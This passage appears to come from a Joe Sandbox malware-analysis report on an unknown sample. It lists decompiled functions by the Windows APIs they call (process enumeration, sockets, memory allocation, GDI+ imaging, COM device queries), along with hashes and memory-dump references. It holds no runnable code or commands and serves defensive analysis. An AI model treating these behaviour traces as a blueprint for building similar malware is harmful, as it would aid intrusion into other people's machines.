                                                                                                                                                                        • Part of subcall function 02C69754: DecodePointer.KERNEL32(?,02C69FB0,00000000,00000001,00000000,?,02C6C0CF,00000018,02C77C70,0000000C,02C6C15F,00000000,00000000,?,02C699BA,0000000D), ref: 02C6976F
                                                                                                                                                                        • Part of subcall function 02C69754: TlsSetValue.KERNEL32(00000000,?,02C69FB0,00000000,00000001,00000000,?,02C6C0CF,00000018,02C77C70,0000000C,02C6C15F,00000000,00000000,?,02C699BA), ref: 02C6977E
                                                                                                                                                                      • ___fls_getvalue@4.LIBCMT ref: 02C671C7
                                                                                                                                                                        • Part of subcall function 02C69734: TlsGetValue.KERNEL32(?,?,02C671CC,00000000), ref: 02C69742
                                                                                                                                                                      • ___fls_setvalue@8.LIBCMT ref: 02C671DA
                                                                                                                                                                        • Part of subcall function 02C69788: DecodePointer.KERNEL32(?,?,?,02C671DF,00000000,?,00000000), ref: 02C69799
                                                                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000000), ref: 02C671E3
                                                                                                                                                                      • ExitThread.KERNEL32 ref: 02C671EA
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 02C671F0
                                                                                                                                                                      • __freefls@4.LIBCMT ref: 02C67210
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2383549826-0
                                                                                                                                                                      • Opcode ID: 04cee7f23c2e6b5c55e0e74a01a11b299bfa468755313ba5c61f5ce3aff9ff0b
                                                                                                                                                                      • Instruction ID: 7a70c099898340160f26cf85437deef104ca173928c23ae8a151131585a7aa76
                                                                                                                                                                      • Opcode Fuzzy Hash: 04cee7f23c2e6b5c55e0e74a01a11b299bfa468755313ba5c61f5ce3aff9ff0b
                                                                                                                                                                      • Instruction Fuzzy Hash: D2F03074900644ABC704BF71CDCCA7EBBAAEF893587148D59E90987211DB38D44AEFA1
                                                                                                                                                                      Function 03776050 Relevance: 9.1, APIs: 6, Instructions: 86processCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 0377607C
                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00000000), ref: 03776088
                                                                                                                                                                      • Process32FirstW.KERNEL32(00000000,00000000), ref: 037760B9
                                                                                                                                                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 0377610F
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 03776116
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memset
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2526126748-0
                                                                                                                                                                      • Opcode ID: 388b9ba65ec6bc47a5da01a7cb8afcf5094b7d7ee16c67fa854bfa2d829377b6
                                                                                                                                                                      • Instruction ID: 8242cf3445e89389d63d93b969c6c77433a60e832b84e3babe6503df6cc7ff69
                                                                                                                                                                      • Opcode Fuzzy Hash: 388b9ba65ec6bc47a5da01a7cb8afcf5094b7d7ee16c67fa854bfa2d829377b6
                                                                                                                                                                      • Instruction Fuzzy Hash: 9021B53160111CABDF20FF64DC99BEAB3A9EF19310F044799DD0A97285EB359A11C660
                                                                                                                                                                      Function 02C632E0 Relevance: 9.0, APIs: 6, Instructions: 32synchronizationsleepCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02C632F1
                                                                                                                                                                      • Sleep.KERNEL32(00000258), ref: 02C632FE
                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,00000000), ref: 02C63306
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02C63312
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02C6331A
                                                                                                                                                                      • Sleep.KERNEL32(0000012C), ref: 02C6332B
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ObjectSingleWait$Sleep$ExchangeInterlocked
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3137405945-0
                                                                                                                                                                      • Opcode ID: ca8f75170d32847590dfd7b574060c08877c27de45f3996b1c1277ab9a7b2478
                                                                                                                                                                      • Instruction ID: f44daa0004e5b87f278101630010836630985c3538b62a20c260317a278bb909
                                                                                                                                                                      • Opcode Fuzzy Hash: ca8f75170d32847590dfd7b574060c08877c27de45f3996b1c1277ab9a7b2478
                                                                                                                                                                      • Instruction Fuzzy Hash: 4CF082726443046BD710ABA9DC84F46F3A8EF85370B204B0DF221872D0CAB0E8058BA0
                                                                                                                                                                      Function 03776690 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110comCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 0377669B
                                                                                                                                                                      • CoCreateInstance.OLE32(037946FC,00000000,00000001,0379471C,?,?,?,?,?,?,?,?,?,?,0377588A), ref: 037766B2
                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 0377674C
                                                                                                                                                                      • CoUninitialize.OLE32(?,?,?,?,?,?,?,?,?,0377588A), ref: 0377677D
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateFreeInitializeInstanceStringUninitialize
                                                                                                                                                                      • String ID: FriendlyName
                                                                                                                                                                      • API String ID: 841178590-3623505368
                                                                                                                                                                      • Opcode ID: ae5d2df0f5960ca19a5901344becab1e914ea51eea5f082251c51b302b269d92
                                                                                                                                                                      • Instruction ID: d549c421b8de3b784cecdde13776b3995c531f31f3584cfaa405a2d73bb72e48
                                                                                                                                                                      • Opcode Fuzzy Hash: ae5d2df0f5960ca19a5901344becab1e914ea51eea5f082251c51b302b269d92
                                                                                                                                                                      • Instruction Fuzzy Hash: 27314C75700609AFDB00EB99DC81EAEB7B9EF88704F148599E504EB255DA71ED02CBA0
                                                                                                                                                                      Function 0377F707 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _malloc.LIBCMT ref: 0377F721
                                                                                                                                                                        • Part of subcall function 0377F673: __FF_MSGBANNER.LIBCMT ref: 0377F68C
                                                                                                                                                                        • Part of subcall function 0377F673: __NMSG_WRITE.LIBCMT ref: 0377F693
                                                                                                                                                                        • Part of subcall function 0377F673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,03784500,00000000,00000001,00000000,?,03788DE6,00000018,03796448,0000000C,03788E76), ref: 0377F6B8
                                                                                                                                                                      • std::exception::exception.LIBCMT ref: 0377F756
                                                                                                                                                                      • std::exception::exception.LIBCMT ref: 0377F770
                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 0377F781
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                                                                                                                      • String ID: bad allocation
                                                                                                                                                                      • API String ID: 615853336-2104205924
                                                                                                                                                                      • Opcode ID: 07deae21b8db98310831a1c6a66b2e22a16b5e444c41016034b8d87c5b2c596e
                                                                                                                                                                      • Instruction ID: 969ae337cf999c895ce36b495e526b38fe6c0b0de8c008247b2875f1e564b690
                                                                                                                                                                      • Opcode Fuzzy Hash: 07deae21b8db98310831a1c6a66b2e22a16b5e444c41016034b8d87c5b2c596e
                                                                                                                                                                      • Instruction Fuzzy Hash: 65F028759003096FEF00FF64EE29A9E77E8AB40214F94455EE414DA191DB70CA05CF94
                                                                                                                                                                      Function 03772D30 Relevance: 7.5, APIs: 5, Instructions: 36COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 03772D5C
                                                                                                                                                                      • CancelIo.KERNEL32(?), ref: 03772D66
                                                                                                                                                                      • InterlockedExchange.KERNEL32(00000000,00000000), ref: 03772D6F
                                                                                                                                                                      • closesocket.WS2_32(?), ref: 03772D79
                                                                                                                                                                      • SetEvent.KERNEL32(00000001), ref: 03772D83
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1486965892-0
                                                                                                                                                                      • Opcode ID: 0a33f683cdfb380a2a6202ea7a25bbd85e88048cbd921c341c773a21686d590f
                                                                                                                                                                      • Instruction ID: ba7bb9720353917c3f59ea06304e6695f3620c74576d7d9a3cb469c513684a35
                                                                                                                                                                      • Opcode Fuzzy Hash: 0a33f683cdfb380a2a6202ea7a25bbd85e88048cbd921c341c773a21686d590f
                                                                                                                                                                      • Instruction Fuzzy Hash: EAF08C76100708BBC224AF54DD09F6677B8FB48B11F104B0DF69696685C6B4B5098BA0
                                                                                                                                                                      Function 02C62D10 Relevance: 7.5, APIs: 5, Instructions: 36COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 02C62D3C
                                                                                                                                                                      • CancelIo.KERNEL32(?), ref: 02C62D46
                                                                                                                                                                      • InterlockedExchange.KERNEL32(00000000,00000000), ref: 02C62D4F
                                                                                                                                                                      • closesocket.WS2_32(?), ref: 02C62D59
                                                                                                                                                                      • SetEvent.KERNEL32(00000001), ref: 02C62D63
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1486965892-0
                                                                                                                                                                      • Opcode ID: 8bd0fdc2c39833d558f301daefbe1ba677d7b9bda04fcfce4fb71925e1e9a7b1
                                                                                                                                                                      • Instruction ID: 52f12b1fa099a2ddbfd7d23497ec0f3afbf5502697c6cbad0e467f00a8d76112
                                                                                                                                                                      • Opcode Fuzzy Hash: 8bd0fdc2c39833d558f301daefbe1ba677d7b9bda04fcfce4fb71925e1e9a7b1
                                                                                                                                                                      • Instruction Fuzzy Hash: E6F03C76540700ABD3209B54DC49B6677B8FB89B51F504B59FA8296680C7B0B9088BE0
                                                                                                                                                                      Function 02C66F17 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _malloc.LIBCMT ref: 02C66F31
                                                                                                                                                                        • Part of subcall function 02C66E83: __FF_MSGBANNER.LIBCMT ref: 02C66E9C
                                                                                                                                                                        • Part of subcall function 02C66E83: __NMSG_WRITE.LIBCMT ref: 02C66EA3
                                                                                                                                                                        • Part of subcall function 02C66E83: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,02C69FB0,00000000,00000001,00000000,?,02C6C0CF,00000018,02C77C70,0000000C,02C6C15F), ref: 02C66EC8
                                                                                                                                                                      • std::exception::exception.LIBCMT ref: 02C66F66
                                                                                                                                                                      • std::exception::exception.LIBCMT ref: 02C66F80
                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 02C66F91
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 615853336-0
                                                                                                                                                                      • Opcode ID: c23868b166ea9cc043d65622fb1861312c90d5d6ed2f04400c2b65aa4641cf2f
                                                                                                                                                                      • Instruction ID: ea5d3101783e424ae9d318e90aea146cb6bb983b3287f89f607723846c5ece53
                                                                                                                                                                      • Opcode Fuzzy Hash: c23868b166ea9cc043d65622fb1861312c90d5d6ed2f04400c2b65aa4641cf2f
                                                                                                                                                                      • Instruction Fuzzy Hash: 52F02D719001099EEB00EBF4D888B7E7BAF9B40714F24041AD408A6090DBB58B45DF41
                                                                                                                                                                      Function 03773160 Relevance: 4.6, APIs: 3, Instructions: 88threadCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0377316B
                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,00000001), ref: 03773183
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0377322F
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CurrentThread$ExchangeInterlocked
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4033114805-0
                                                                                                                                                                      • Opcode ID: 771782bd376dd74581651d55bec6480e838d96cda39b3cf816e97f7ed160856f
                                                                                                                                                                      • Instruction ID: b525334461cfe9280307238acfe5c9d1857a40bb09a695862dfa00f5d77a93e0
                                                                                                                                                                      • Opcode Fuzzy Hash: 771782bd376dd74581651d55bec6480e838d96cda39b3cf816e97f7ed160856f
                                                                                                                                                                      • Instruction Fuzzy Hash: 55319F78200606AFEB14DF69C884A66B3E9FF44714B10C56DE81ACB615D731F842DBD0
                                                                                                                                                                      Function 037711B0 Relevance: 4.6, APIs: 3, Instructions: 76memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __floor_pentium4.LIBCMT ref: 037711E9
                                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 03771226
                                                                                                                                                                      • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 03771255
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Virtual$AllocFree__floor_pentium4
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2605973128-0
                                                                                                                                                                      • Opcode ID: 9eea477d7ad238b1887659e87d7005f8eb332deb951a910a9d296b6ec1380449
                                                                                                                                                                      • Instruction ID: 1dc96ba659d35724229b9225d30e60ac1f3c65c4e06a4fc14b0cb00ad2510ba9
                                                                                                                                                                      • Opcode Fuzzy Hash: 9eea477d7ad238b1887659e87d7005f8eb332deb951a910a9d296b6ec1380449
                                                                                                                                                                      • Instruction Fuzzy Hash: 4A218E71B00709ABDF14EFAAD845B6EBBF8EF44705F4085A9E859A6640E630A8108740
                                                                                                                                                                      Function 02C611B0 Relevance: 4.6, APIs: 3, Instructions: 76memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __floor_pentium4.LIBCMT ref: 02C611E9
                                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 02C61226
                                                                                                                                                                      • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02C61255
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Virtual$AllocFree__floor_pentium4
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2605973128-0
                                                                                                                                                                      • Opcode ID: 73764d3fb8ed0509a14ea7b97043212be532da2f62c53e544ee1f2459a590aa1
                                                                                                                                                                      • Instruction ID: 47e3591437734e6537ac3a8c0808e176e7ac120a5507ddb6f9edbb5219fe1e24
                                                                                                                                                                      • Opcode Fuzzy Hash: 73764d3fb8ed0509a14ea7b97043212be532da2f62c53e544ee1f2459a590aa1
                                                                                                                                                                      • Instruction Fuzzy Hash: 2021D430E003099FDB149FA9DC89B6EF7F5FF40706F0085ADE949E2640E770A9148B50
                                                                                                                                                                      Function 03771100 Relevance: 4.6, APIs: 3, Instructions: 66memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __floor_pentium4.LIBCMT ref: 0377112F
                                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0377115F
                                                                                                                                                                      • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 03771192
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Virtual$AllocFree__floor_pentium4
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2605973128-0
                                                                                                                                                                      • Opcode ID: 263281c9e1341a81f3816f4ca32f867e02656c6f3b229984c6849d2050584415
                                                                                                                                                                      • Instruction ID: 1126c57367a063ddc37eb7ff94a21b793ade5f1bda0b23936f5486f013b9e839
                                                                                                                                                                      • Opcode Fuzzy Hash: 263281c9e1341a81f3816f4ca32f867e02656c6f3b229984c6849d2050584415
                                                                                                                                                                      • Instruction Fuzzy Hash: 3F119370A00708AFDF10EFA9D886B6EFBF8EF04705F4085A9E959E6640E674A9108B50
                                                                                                                                                                      Function 02C61100 Relevance: 4.6, APIs: 3, Instructions: 66memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __floor_pentium4.LIBCMT ref: 02C6112F
                                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 02C6115F
                                                                                                                                                                      • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02C61192
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Virtual$AllocFree__floor_pentium4
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2605973128-0
                                                                                                                                                                      • Opcode ID: ca69ebfc2f811f21a82ee9d4a87c9804d2a470a99db2c8d96726202f13b87731
                                                                                                                                                                      • Instruction ID: 23cda91f343ad84a5b4efaef47097f88b9edc4abfda1360462b19195327791cd
                                                                                                                                                                      • Opcode Fuzzy Hash: ca69ebfc2f811f21a82ee9d4a87c9804d2a470a99db2c8d96726202f13b87731
                                                                                                                                                                      • Instruction Fuzzy Hash: E9119670E40709ABDB109FA9DC89B6EF7F8FF44706F008569ED59D2240E77099548750
                                                                                                                                                                      Function 03779DE0 Relevance: 4.5, APIs: 3, Instructions: 39windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 03779E04
                                                                                                                                                                      • GdipDisposeImage.GDIPLUS(?), ref: 03779E18
                                                                                                                                                                      • GdipDisposeImage.GDIPLUS(?), ref: 03779E3B
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Gdip$DisposeImage$BitmapCreateFromStream
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 800915452-0
                                                                                                                                                                      • Opcode ID: 6ee355fc893a39ce89cda24f1c5512ec5e33dd3b26bf2e5d1d78a3435c3491fa
                                                                                                                                                                      • Instruction ID: a26474d464633698aeff4f5fa12ce661d79292b56ba51b6043c45dfa114923d7
                                                                                                                                                                      • Opcode Fuzzy Hash: 6ee355fc893a39ce89cda24f1c5512ec5e33dd3b26bf2e5d1d78a3435c3491fa
                                                                                                                                                                      • Instruction Fuzzy Hash: A2F0A47290122DA78F10FF94D8448AEF778EB49611B00865AFD05AB340D7344B05CBD0
                                                                                                                                                                      Function 03779AC0 Relevance: 4.5, APIs: 3, Instructions: 36COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • EnterCriticalSection.KERNEL32(0379FB64), ref: 03779ADC
                                                                                                                                                                      • GdiplusStartup.GDIPLUS(0379FB60,?,?), ref: 03779B15
                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(0379FB64), ref: 03779B26
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CriticalSection$EnterGdiplusLeaveStartup
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 389129658-0
                                                                                                                                                                      • Opcode ID: 98ccecad9744003283d38618a7813f3a74f9809b4d11ab4d581d8072eb69b23b
                                                                                                                                                                      • Instruction ID: 48663266cf959f35be6744b03a29c24760da7b6427ab92631aea093d27d0aec6
                                                                                                                                                                      • Opcode Fuzzy Hash: 98ccecad9744003283d38618a7813f3a74f9809b4d11ab4d581d8072eb69b23b
